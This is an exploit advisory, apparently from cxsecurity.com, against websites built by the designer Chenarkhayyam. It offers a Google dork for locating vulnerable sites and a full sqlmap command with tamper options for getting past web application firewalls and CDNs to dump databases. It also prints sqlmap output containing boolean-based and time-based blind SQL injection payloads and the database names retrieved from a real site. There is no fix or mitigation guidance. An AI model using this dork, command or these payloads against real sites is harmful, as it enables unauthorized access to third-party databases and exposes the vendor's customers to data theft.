Chenarkhayyam - Sql Injection And Waf , Cdn Bypass

2024.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Chenarkhayyam - Sql Injection And Waf , Cdn Bypass # Google Dork : "طراحی شده توسط سایت چنار خیام" # Date: 3/16/2024 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: chenarkhayyam (https://chenarkhayyam.com/) # Version: MySQL=5.0.12 # Tested on: Windows/Linux/Android(termux) ## Description: Attacker can go to this web site and find other vulner sites or use google dork : https://chenarkhayyam.com/sample Next part attacker can use sqlmap to dump database and bypass waf and cdn Here is the command : sqlmap -u <Target-Url> --dbs --tamper=randomcase --random-agent --technique=BT --level=5 --risk=3 --threads=1 --current-db --batch # The response will show like this: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=44' AND 5914=5914-- DzUg Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=44' AND (SELECT 7630 FROM (SELECT(SLEEP(5)))zaOE)-- xHny --- [11:02:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [11:02:40] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [11:02:40] [INFO] fetching current database [11:02:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:02:41] [INFO] retrieved: baalinap_balinapp current database: 'baalinap_balinapp' [11:04:18] [INFO] fetching database names [11:04:18] [INFO] fetching number of databases [11:04:18] [INFO] resumed: 2 [11:04:18] [INFO] resumed: information_schema [11:04:18] [INFO] resumed: baalinap_balinapp available databases [2]: [*] baalinap_balinapp [*] information_schema


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top